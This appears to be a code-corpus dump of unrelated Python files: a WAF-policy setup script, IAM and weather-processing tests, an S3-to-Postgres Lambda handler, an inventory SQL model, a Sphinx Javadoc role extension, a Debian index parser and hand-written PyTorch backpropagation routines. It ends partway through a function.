for group in waf_crs["groups"]:
waf_policy_obj["crs_groups"].append(group)
add_allowlist_rule(waf_policy_obj)
disable_crs_response_rules(waf_policy_obj)
add_pre_crs_group(waf_policy_obj)
resp = api.post('wafpolicy', data=json.dumps(waf_policy_obj))
if resp.status_code in range(200, 300):
        logger.debug('Created WAF policy successfully')
else:
logger.error('Error : %s' % resp.text)
def update_waf_policy(api, args, waf_policy_obj):
add_allowlist_rule(waf_policy_obj)
disable_crs_response_rules(waf_policy_obj)
add_pre_crs_group(waf_policy_obj)
resp = api.put('wafpolicy/%s' %waf_policy_obj['uuid'], data=waf_policy_obj)
if resp.status_code in range(200, 300):
        logger.debug('Updated WAF policy successfully')
else:
logger.error('Error : %s' % resp.text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--user', action="store", help='controller user',
default='admin')
parser.add_argument('-p', '--password', action="store", help='controller user password',
default='<PASSWORD>')
parser.add_argument('-t', '--tenant', action="store", help='tenant name',
default='admin')
parser.add_argument('-a', '--authtoken', help='Authentication token')
parser.add_argument('-c', '--controller_ip', action="store", help='controller ip')
args = parser.parse_args()
if args.password:
api = ApiSession.get_session(args.controller_ip, args.user, args.password,
tenant=args.tenant, api_version=API_VERSION)
elif args.authtoken:
api = ApiSession.get_session(args.controller_ip, args.user, tenant=args.tenant,
token=args.authtoken, api_version=API_VERSION)
else:
logging.error("Either password or authtokentoken must be provided.")
sys.exit(1)
waf_policy_obj = api.get_object_by_name('wafpolicy', SYSTEM_WAF_POLICY_VDI)
if not waf_policy_obj:
create_vdi_waf_policy(api, args)
else:
update_waf_policy(api, args, waf_policy_obj)
| 2.328125 | 2 |
src/api/bkuser_core/tests/bkiam/test_constants.py | Chace-wang/bk-user | 0 | 1181 | <reponame>Chace-wang/bk-user
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import pytest
from bkuser_core.bkiam.constants import ResourceType
from bkuser_core.categories.models import Department, ProfileCategory
from bkuser_core.tests.utils import make_simple_department
pytestmark = pytest.mark.django_db
class TestResourceTypeEnum:
@pytest.mark.parametrize(
"is_leaf, path, f, v",
[
(True, "/category,5/department,3440/department,3443/", "parent_id", 3443),
(False, "/category,5/department,3440/department,3443/", "id", 3443),
(True, "/category,5/", "category_id", 5),
(False, "/category,5/", "category_id", 5),
(True, "/department,3440/department,3443/", "parent_id", 3443),
(False, "/department,3440/department,3443/", "id", 3443),
],
)
def test_get_key_mapping(self, is_leaf, path, f, v):
key_mapping = ResourceType.get_key_mapping(ResourceType.DEPARTMENT)
path_method = key_mapping["department._bk_iam_path_"]
data = {"value": path}
if not is_leaf:
data["node_type"] = "non-leaf"
        field, value = path_method(data)
        assert field == f
        assert value == v
@pytest.mark.parametrize(
"dep_chain, expected",
[
(
[1000, 1001, 1002],
{"_bk_iam_path_": "/category,1/department,1000/department,1001/department,1002/"},
),
(
[1000],
{"_bk_iam_path_": "/category,1/department,1000/"},
),
],
)
def test_get_attributes_mapping(self, dep_chain, expected):
target_parent = None
for d in dep_chain:
parent_id = target_parent if not target_parent else target_parent.pk
target_parent = make_simple_department(str(d), force_create_params={"id": d}, parent_id=parent_id)
attributes_mapping = ResourceType.get_attributes_mapping(target_parent)
assert attributes_mapping == expected
def test_get_attributes_mapping_other(self):
pc = ProfileCategory.objects.get_default()
attributes_mapping = ResourceType.get_attributes_mapping(pc)
assert attributes_mapping == {}
@pytest.mark.parametrize(
"dep_chain,expected",
[
(
["a", "b", "c"],
[
("category", "默认目录"),
("department", "a"),
("department", "b"),
("department", "c"),
],
),
(
["a", "b"],
[("category", "默认目录"), ("department", "a"), ("department", "b")],
),
],
)
def test_get_resource_nodes_dep(self, dep_chain, expected):
target_parent = None
for d in dep_chain:
parent_id = target_parent if not target_parent else target_parent.pk
target_parent = make_simple_department(d, parent_id=parent_id)
        # only the parent is added here, so the mptt tree needs to be rebuilt
Department.tree_objects.rebuild()
nodes = ResourceType.get_instance_resource_nodes(target_parent)
assert [(x["type"], x["name"]) for x in nodes] == expected
def test_get_resource_nodes_other(self):
pc = ProfileCategory.objects.get_default()
nodes = ResourceType.get_instance_resource_nodes(pc)
assert [(x["type"], x["name"]) for x in nodes] == [("category", "默认目录")]
| 1.710938 | 2 |
votesim/benchmarks/__init__.py | johnh865/election_sim | 8 | 1182 | <filename>votesim/benchmarks/__init__.py
# from votesim.benchmarks.benchrunner import (
# run_benchmark,
# get_benchmarks,
# post_benchmark,
# plot_benchmark,
# )
from votesim.benchmarks import runtools, simple | 1.117188 | 1 |
src/handler.py | MrIgumnov96/ETL-CloudDeployment | 0 | 1183 | import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
connection = ps.connect(dbname=dbname,
host=host,
port=port,
user=user,
password=password)
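# handle() below pulls the bucket name and object key out of a standard S3
# "ObjectCreated" event. A minimal sketch of the fields it relies on
# (values are illustrative only):
#
#   event = {
#       "Records": [
#           {"s3": {"bucket": {"name": "my-bucket"},
#                   "object": {"key": "path/to/file.csv"}}}
#       ]
#   }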
def handle(event, context):
cursor = connection.cursor()
cursor.execute("SELECT 1", ())
print(cursor.fetchall())
# Get key and bucket informaition
key = event['Records'][0]['s3']['object']['key']
bucket = event['Records'][0]['s3']['bucket']['name']
# use boto3 library to get object from S3
s3 = boto3.client('s3')
s3_object = s3.get_object(Bucket = bucket, Key = key)
data = s3_object['Body'].read().decode('utf-8')
all_lines = []
# read CSV
# csv_data = csv.reader(data.splitlines())
# for row in csv_data:
# datestr = row[0] #.replace('/', '-')
# # print(datestr)
# date_obj = datetime.strptime(datestr, '%d/%m/%Y %H:%M')
# # print(date_obj)
# # time = str(row[0][-5:])
# location = str(row[1])
# order = str(row[3])
# total = str(row[4])
# all_lines.append({'date':date_obj, 'location':location, 'order':order, 'total':total})
# return cached_list
# print(all_lines)
app.start_app(all_lines, data)
    for line in all_lines:
        print(line)
return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines) | 2.4375 | 2 |
improver_tests/precipitation_type/test_utilities.py | cpelley/improver | 77 | 1184 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
""" Tests of precipitation_type utilities"""
import numpy as np
import pytest
from iris.exceptions import CoordinateNotFoundError
from improver.metadata.constants import FLOAT_DTYPE
from improver.precipitation_type.utilities import make_shower_condition_cube
from improver.synthetic_data.set_up_test_cubes import set_up_probability_cube
def set_up_test_cube(n_thresholds=1):
"""Set up a cube testing shower condition conversion"""
thresholds = np.arange(n_thresholds)
shape = [2, 2]
shape = [n_thresholds, *shape] if n_thresholds > 0 else shape
data = np.ones(shape, dtype=FLOAT_DTYPE)
cube = set_up_probability_cube(
data,
thresholds,
variable_name="texture_of_cloud_area_fraction",
threshold_units=1,
spatial_grid="equalarea",
)
return cube
def test_basic():
"""Test that with a valid input the cube is transformed into a shower
condition cube."""
cube = set_up_test_cube()
result = make_shower_condition_cube(cube)
threshold_coord = result.coord(var_name="threshold")
assert result.name() == "probability_of_shower_condition_above_threshold"
assert result.dtype == FLOAT_DTYPE
assert (result.data == cube.data).all()
assert threshold_coord.name() == "shower_condition"
assert threshold_coord.units == 1
def test_no_threshold_coord():
"""Test an exception is raised if the proxy diagnostic cube does not have
a threshold coordinate."""
cube = set_up_test_cube()
cube.remove_coord("texture_of_cloud_area_fraction")
expected = "Input has no threshold coordinate and cannot be used"
with pytest.raises(CoordinateNotFoundError, match=expected):
make_shower_condition_cube(cube)
def test_multi_valued_threshold_coord():
"""Test an exception is raised if the proxy diagnostic cube has a multi
valued threshold coordinate."""
cube = set_up_test_cube(n_thresholds=2)
expected = "Expected a single valued threshold coordinate.*"
with pytest.raises(ValueError, match=expected):
make_shower_condition_cube(cube)
| 1.46875 | 1 |
app/api/v1/models/items.py | bryan-munene/Store-Manager-DB | 0 | 1185 | from .db_conn import ModelSetup
class ItemsModel(ModelSetup):
'''Handles the data logic of the items section'''
def __init__(
self,
name=None,
price=None,
quantity=None,
category_id=None,
reorder_point=None,
auth=None):
'''Initializes the variables for the items class'''
self.name = name
self.price = price
self.quantity = quantity
self.category_id = category_id
self.reorder_point = reorder_point
self.auth = auth
def add_item(
self,
name,
price,
quantity,
image,
category_id,
reorder_point,
auth):
        '''Adds an item with the given arguments, then returns the created item.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """INSERT INTO items(name, price, quantity, image, category, reorder_point, created_by)\
VALUES(%s,%s,%s,%s,%s,%s,%s);"""
self.cur.execute(
query,
(name,
price,
quantity,
image,
category_id,
reorder_point,
auth))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE name = %s AND price = %s;"""
self.cur.execute(query_confirm, (name, price))
self.item = self.cur.fetchone()
return self.item
def get_all(self):
        '''Gets all item records in the database and returns them.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items;"""
self.cur.execute(query)
self.items = self.cur.fetchall()
return self.items
def get_by_id(self, item_id):
        '''Retrieves a single item by its unique item_id.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def get_by_category(self, category):
        '''Retrieves all items that belong to the given category.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE category LIKE %s;"""
        self.cur.execute(query, (category,))
self.item = self.cur.fetchall()
return self.item
def get_by_name_and_price(self, name, price):
        '''Retrieves a single item by its unique name and price combination.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE name LIKE %s AND price = %s;"""
self.cur.execute(query, (name, price))
self.item = self.cur.fetchone()
return self.item
def update_item(
self,
item_id,
price,
quantity,
image,
category_id,
reorder_point,
auth):
        '''Updates an item's details; the stored values are replaced with those provided.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """UPDATE items
SET price = %s, quantity = %s, image = %s, category = %s, reorder_point = %s, created_by = %s
WHERE item_id= %s
"""
self.cur.execute(
query,
(price,
quantity,
image,
category_id,
reorder_point,
auth,
item_id))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query_confirm, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def update_item_quantity(self, item_id, quantity):
        '''Updates an item's quantity, setting it to the value provided.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """UPDATE items
SET quantity = %s
WHERE item_id= %s
"""
self.cur.execute(query, (quantity, item_id))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query_confirm, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def delete_item(self, item_id):
        '''Deletes an item identified by its item_id.'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """DELETE FROM items WHERE item_id = %s"""
self.cur.execute(query, (item_id, ))
self.conn.commit()
query_confirm = """SELECT * FROM items;"""
self.cur.execute(query_confirm)
self.items = self.cur.fetchall()
return self.items
| 3.21875 | 3 |
site/src/sphinx/_extensions/api.py | linxGnu/armeria | 0 | 1186 | <reponame>linxGnu/armeria
from docutils.parsers.rst.roles import register_canonical_role, set_classes
from docutils.parsers.rst import directives
from docutils import nodes
from sphinx.writers.html import HTMLTranslator
from sphinx.errors import ExtensionError
import os
import re
def api_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
return api_role_internal(False, role, rawtext, text, lineno, inliner, options, content)
def apiplural_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
return api_role_internal(True, role, rawtext, text, lineno, inliner, options, content)
def api_role_internal(plural, role, rawtext, text, lineno, inliner, options, content):
set_classes(options)
classes = ['code', 'api-reference']
if 'classes' in options:
classes.extend(options['classes'])
node = nodes.literal(rawtext, text, classes=classes, api_reference=True, is_plural=plural)
return [node], []
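# Usage sketch (assumed, based on standard docutils role syntax): in an .rst
# source these roles are written as
#
#   :api:`HttpClient`        -> renders a Javadoc link for the class
#   :apiplural:`HttpClient`  -> the same link with a plural suffix appended
#
# The class name above is only an example; any simple or fully-qualified name
# resolvable from the generated Javadoc works.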
def api_visit_literal(self, node, next_visitor):
if 'api_reference' not in node.attributes:
return next_visitor(self, node)
env = self.builder.env
javadoc_dir = os.path.abspath(env.config['javadoc_dir'])
# Build the mappings from a simple class name to its Javadoc file.
if not hasattr(env, '__javadoc_cache__'):
env.__javadoc_mappings__ = javadoc_mappings = {}
for dirname, subdirs, files in os.walk(javadoc_dir):
for basename in files:
if re.match(r'^[^A-Z]', basename) or not basename.endswith('.html'):
# Ignore the non-class files. We rely on the simple assumption that
# a class name always starts with an upper-case English alphabet.
continue
simple_class_name = basename[:-5].replace('.', '$')
javadoc_mappings[simple_class_name] = os.path.relpath(dirname, javadoc_dir) \
.replace(os.sep, '/') + '/' + basename
else:
javadoc_mappings = env.__javadoc_mappings__
text = node.astext()
if text.startswith('@'):
text = text[1:]
is_annotation = True
else:
is_annotation = False
if text.find('.') != -1:
# FQCN or package name.
if re.fullmatch(r'^[^A-Z$]+$', text):
# Package
uri = text.replace('.', '/') + '/package-summary.html'
else:
# Class
uri = text.replace('.', '/').replace('$', '.') + '.html'
text = re.sub(r'^.*\.', '', text).replace('$', '.')
else:
# Simple class name; find from the pre-calculated mappings.
if text not in javadoc_mappings:
raise ExtensionError('Cannot find a class from Javadoc: ' + text)
uri = javadoc_mappings[text]
text = text.replace('$', '.')
# Prepend the frame index.html path.
uri = os.path.relpath(javadoc_dir, env.app.outdir).replace(os.sep, '/') + '/index.html?' + uri
# Prepend the '@' back again if necessary
if is_annotation:
text = '@' + text
# Emit the tags.
self.body.append(self.starttag(node, 'code', suffix='', CLASS='docutils literal javadoc'))
self.body.append(self.starttag(node, 'a', suffix='', CLASS='reference external javadoc', HREF=uri))
self.body.append(text + '</a>')
# Append a plural suffix.
if node.attributes['is_plural']:
self.body.append(self.starttag(node, 'span', suffix='', CLASS='plural-suffix'))
if re.fullmatch(r'^.*(ch|s|sh|x|z)$', text):
self.body.append('es')
else:
self.body.append('s')
self.body.append('</span>')
self.body.append('</code>')
raise nodes.SkipNode
def setup(app):
app.add_config_value('javadoc_dir', os.path.join(app.outdir, 'apidocs'), 'html')
# Register the 'javadoc' role.
api_role.options = {'class': directives.class_option}
register_canonical_role('api', api_role)
register_canonical_role('apiplural', apiplural_role)
# Intercept the rendering of HTML literals.
old_visitor = HTMLTranslator.visit_literal
HTMLTranslator.visit_literal = lambda self, node: api_visit_literal(self, node, old_visitor)
pass
| 2.171875 | 2 |
feaas/runners/__init__.py | tsuru/varnishapi | 3 | 1187 | # Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import time
from feaas import storage
class Base(object):
def __init__(self, manager, interval, *locks):
self.manager = manager
self.storage = manager.storage
self.interval = interval
def init_locker(self, *lock_names):
self.locker = storage.MultiLocker(self.storage)
for lock_name in lock_names:
self.locker.init(lock_name)
def loop(self):
self.running = True
while self.running:
self.run()
time.sleep(self.interval)
def stop(self):
self.running = False
| 2.359375 | 2 |
ros_buildfarm/debian_repo.py | j-rivero/ros_buildfarm | 0 | 1188 | # Copyright 2014 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from .common import PlatformPackageDescriptor
from .http_cache import fetch_and_cache_gzip
def get_debian_repo_index(debian_repository_baseurl, target, cache_dir):
url = os.path.join(
debian_repository_baseurl, 'dists', target.os_code_name, 'main')
if target.arch == 'source':
url = os.path.join(url, 'source', 'Sources.gz')
else:
url = os.path.join(url, 'binary-%s' % target.arch, 'Packages.gz')
cache_filename = fetch_and_cache_gzip(url, cache_dir)
logging.debug('Reading file: %s' % cache_filename)
# split package blocks
with open(cache_filename, 'rb') as f:
blocks = f.read().decode('utf8').split('\n\n')
blocks = [b.splitlines() for b in blocks if b]
# extract version number of every package
package_versions = {}
for lines in blocks:
prefix = 'Package: '
assert lines[0].startswith(prefix)
debian_pkg_name = lines[0][len(prefix):]
prefix = 'Version: '
versions = [l[len(prefix):] for l in lines if l.startswith(prefix)]
version = versions[0] if len(versions) == 1 else None
prefix = 'Source: '
source_names = [l[len(prefix):] for l in lines if l.startswith(prefix)]
source_name = source_names[0] if len(source_names) == 1 else None
package_versions[debian_pkg_name] = PlatformPackageDescriptor(version, source_name)
return package_versions
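# For reference, each block parsed above is a Debian Packages/Sources stanza of
# roughly this form (package name and version are illustrative):
#
#   Package: ros-noetic-foo
#   Version: 1.2.3-1focal
#   Source: ros-noetic-foo-src
#
# Only the Package, Version and Source fields are used here.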
| 2.015625 | 2 |
player.py | Drayux/Battlematus | 0 | 1189 | # PLAYER
class player:
	def __init__(self):
		pass
| 1.695313 | 2 |
Framwork-Backpropagation/utils/utils_v2.py | ConvolutedDog/Implicit-Im2col-for-Backpropagation | 0 | 1190 | # Copyright 2022 ConvolutedDog (https://github.com/ConvolutedDog/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python3
import torch
import torch.nn as nn
import torch.nn.functional as F
from graphviz import Digraph, render
from torch.autograd import Variable
@torch.no_grad()
def cross_entropy_loss(y_predict, y_true):
print('\n=========================== Layer:'+' {0:18}'.format('cross_entropy_loss')+' Start ===========================')
print('# y_predict.shape: ', list(y_predict.shape))
print('# y_true.shape: ', list(y_true.shape))
y_shift = torch.sub(y_predict, torch.max(y_predict, dim=1, keepdim=True).values)
y_exp = torch.exp(y_shift)
y_probability = torch.div(y_exp, torch.sum(y_exp, dim=1, keepdim=True))
ypred_loss = torch.mean(-torch.sum(torch.mul(y_true, torch.log(y_probability)), dim=1, keepdim=True))
dLoss_dypred = y_probability - y_true
print('# dLoss_dypred.shape: ', list(dLoss_dypred.shape))
print('# Self calculated loss: ', ypred_loss.item())
print('=========================== Layer:'+' {0:18}'.format('cross_entropy_loss')+' End =============================')
return ypred_loss, dLoss_dypred
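# The function above follows the usual softmax + cross-entropy identities:
#   p_i = exp(z_i - max(z)) / sum_j exp(z_j - max(z))   (numerically stable softmax)
#   L   = -sum_i y_i * log(p_i)                         (averaged over the batch)
#   dL/dz_i = p_i - y_i
# which is exactly what `dLoss_dypred = y_probability - y_true` computes.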
@torch.no_grad()
def fc_backward(dLoss_dnextz, z, w):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
print('# z.shape: ', list(z.shape))
print('# weight.shape: ', list(w.shape))
print('# bias.shape: ', '['+str(dLoss_dnextz.shape[1])+']')
N = z.shape[0]
if len(z.shape) == 4:
z = z.view(z.size(0), -1)
dLoss_dz = torch.matmul(dLoss_dnextz, w) #delta
dLoss_dfcW = torch.matmul(dLoss_dnextz.t(), z)
dLoss_dfcB = torch.sum(dLoss_dnextz, dim=0)
print('# dz.shape: ', list(dLoss_dz.shape))
print('# dweight.shape: ', list(dLoss_dfcW.shape))
print('# dbias.shape: ', list(dLoss_dfcB.shape))
return dLoss_dz, dLoss_dfcW/N, dLoss_dfcB/N
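# Shapes and formulas used by fc_backward (delta = dLoss_dnextz, batch size N):
#   dz = delta @ W        -> gradient w.r.t. the layer input
#   dW = delta^T @ z      -> gradient w.r.t. the weights (returned divided by N)
#   db = sum_n delta[n]   -> gradient w.r.t. the bias    (returned divided by N)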
@torch.no_grad()
def view_backward(dLoss_dnextz, last_z, params):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
print('# last_z.shape: ', list(last_z.shape))
if params:
pooling = params[0]
stride = params[1]
padding = params[2]
output_size = (int((last_z.shape[2]-pooling[0]+2*padding[0])/stride[0]+1), \
int((last_z.shape[3]-pooling[0]+2*padding[0])/stride[0]+1))
dLoss_dz = dLoss_dnextz.reshape(last_z.shape[0], last_z.shape[1], output_size[0], output_size[1])
else:
dLoss_dz = dLoss_dnextz.reshape(last_z.shape)
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
def add_backward(dLoss_dnextz):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
dLoss_dz = dLoss_dnextz
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def relu_backward(next_dz, z):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
zeros_tensor = torch.zeros_like(next_dz)
dLoss_dz = torch.where(torch.gt(z, 0), next_dz, zeros_tensor)
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def dropback_backward(next_dz, mask, p):
print('# zeros probability: ', p)
print('# next_dz.shape: ', list(next_dz.shape))
print('# mask.shape: ', list(mask.shape))
zeros_tensor = torch.zeros_like(mask)
dLoss_dz = torch.mul(torch.where(torch.eq(mask, 1.), next_dz, zeros_tensor), 1./(1.-p))
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def max_pooling_backward(next_dz, z, pooling, strides, padding=(0, 0)):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# padding: ', padding)
print('# strides: ', strides)
N, C, H, W = z.shape
_, _, out_h, out_w = next_dz.shape
padding_z = F.pad(z, pad=(padding[1],padding[1],padding[0],\
padding[0],0,0), mode='constant', value=0)
padding_dz = torch.zeros_like(padding_z)
for n in torch.arange(N):
for c in torch.arange(C):
for i in torch.arange(out_h):
for j in torch.arange(out_w):
flat_idx = torch.argmax(padding_z[n, c,
strides[0] * i:strides[0] * i + pooling[0],
strides[1] * j:strides[1] * j + pooling[1]])
h_idx = strides[0] * i + flat_idx // pooling[1]
w_idx = strides[1] * j + flat_idx % pooling[1]
padding_dz[n, c, h_idx, w_idx] += next_dz[n, c, i, j]
dz = _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
print('# dz.shape: ', list(dz.shape))
return dz
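# In max pooling the gradient flows only to the input position that produced the
# maximum inside each pooling window; every other position receives zero. The
# argmax bookkeeping above implements exactly that, with padding added before
# the scatter and stripped again at the end.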
@torch.no_grad()
def batchnorm2d_backward(next_dz, z, eps, gamma=torch.Tensor([1.,1.,1.])):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# eps: ', eps)
print('# gamma.shape: ', list(gamma.shape))
N, C, H, W = z.shape
m = N*H*W
shape = [N,C,H,W]
import numpy as np
ax = list(np.arange(len(shape)))
shape.pop(1)
ax.pop(1)
axis = tuple(ax)
dxhut = torch.zeros_like(next_dz)
for c in range(C):
dxhut[:,c] = next_dz[:,c]*gamma[c]
dz1 = m*dxhut
mu = z.mean(axis=axis, keepdim=True)
xmu = z - mu
xmu2 = xmu**2
var = xmu2.sum(axis=axis, keepdim=True)/m
ivar = 1./torch.pow(var+eps, 0.5)
dz2 = (ivar**2)*((dxhut*xmu).sum(axis=axis, keepdim=True))*xmu
dz3 = dxhut.sum(axis=axis, keepdim=True)
dz = ivar/m*(dz1-dz2-dz3)
print('# dz.shape: ', list(dz.shape))
return dz
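# This matches the standard batch-norm backward formula (per channel, m = N*H*W,
# dxhat = upstream gradient scaled by gamma):
#   dx = 1 / (m * sqrt(var + eps)) * (m*dxhat - xhat*sum(dxhat*xhat) - sum(dxhat))
# dz1, dz2 and dz3 above are the three terms inside the parentheses.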
@torch.no_grad()
def average_pooling_backward(next_dz, z, pooling, strides, padding=(0, 0)):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# padding: ', padding)
print('# strides: ', strides)
N, C, H, W = z.shape
_, _, out_h, out_w = next_dz.shape
padding_z = F.pad(z, pad=(padding[1],padding[1],padding[0],\
padding[0],0,0), mode='constant', value=0)
padding_dz = torch.zeros_like(padding_z)
for n in torch.arange(N):
for c in torch.arange(C):
for i in torch.arange(out_h):
for j in torch.arange(out_w):
padding_dz[n, c,
strides[0] * i:strides[0] * i + pooling[0],
strides[1] * j:strides[1] * j + pooling[1]] += next_dz[n, c, i, j] / (pooling[0] * pooling[1])
dz = _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
print('# dz.shape: ', list(dz.shape))
return dz
@torch.no_grad()
def _remove_padding(z, padding):
if padding[0] > 0 and padding[1] > 0:
return z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
elif padding[0] > 0:
return z[:, :, padding[0]:-padding[0], :]
elif padding[1] > 0:
return z[:, :, :, padding[1]:-padding[1]]
else:
return z
@torch.no_grad()
def conv_backward(next_dz, K, z, padding=(0, 0), strides=(1, 1)):
N, C, H, W = z.shape
D, C, k1, k2 = K.shape
N, D, H1, W1 = next_dz.shape
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# weight.shape: ', list(K.shape))
print('# bias.shape: ', '['+str(K.shape[0])+']')
print('# padding: ', padding)
print('# strides: ', strides)
padding_next_dz = _insert_zeros(next_dz, strides)
flip_K = torch.flip(K, (2, 3))
swap_flip_K = torch.swapaxes(flip_K, 0, 1)
ppadding_next_dz = F.pad(padding_next_dz, pad=(k2-1-padding[1],k2-1-padding[1],\
k1-1-padding[0],k1-1-padding[0],0,0), mode='constant', value=0)
dz = _conv_forward(ppadding_next_dz, swap_flip_K)
swap_z = torch.swapaxes(z, 0, 1)
dK = _conv_forward(torch.swapaxes(F.pad(z, pad=(padding[1],padding[1],\
padding[0],padding[0],0,0), mode='constant', value=0), 0, 1), torch.swapaxes(padding_next_dz, 0, 1))
    db = torch.sum(torch.sum(torch.sum(next_dz, axis=-1), axis=-1), axis=0)  # sum over height and width, then over the batch dimension
print('# dz.shape: ', list(dz.shape))
print('# dweight.shape: ', list(dK.transpose(0,1).shape))
print('# dbias.shape: ', list(db.shape))
return dz, (dK/N).transpose(0,1), db/N
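# conv_backward follows the classic convolution gradients:
#   * dz: zero-insert the upstream gradient according to the stride, pad it with
#     k-1-p, then correlate it with the kernel flipped by 180 degrees and with
#     its in/out channel axes swapped.
#   * dK: correlate the (padded) input with the zero-inserted upstream gradient,
#     treating the batch axis as channels (hence the swapaxes calls).
#   * db: sum the upstream gradient over the batch and spatial axes.
# dK and db are averaged over the batch size N before being returned.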
@torch.no_grad()
def _conv_forward(x, weight, strides=(1,1)):
n, c, h_in, w_in = x.shape
d, c, k, j = weight.shape
x_pad = x
x_pad = x_pad.unfold(2, k, strides[0])
x_pad = x_pad.unfold(3, j, strides[1])
out = torch.einsum(
'nchwkj,dckj->ndhw',
x_pad, weight)
return out
@torch.no_grad()
def _insert_zeros(dz, strides):
N, D, H, W = dz.shape
H_last = (H-1)*(strides[0]-1) + H
W_last = (W-1)*(strides[1]-1) + W
pz = torch.zeros(N, D, H_last, W_last)
for n in range(N):
for d in range(D):
for h in range(0, H_last, strides[0]):
for w in range(0, W_last, strides[1]):
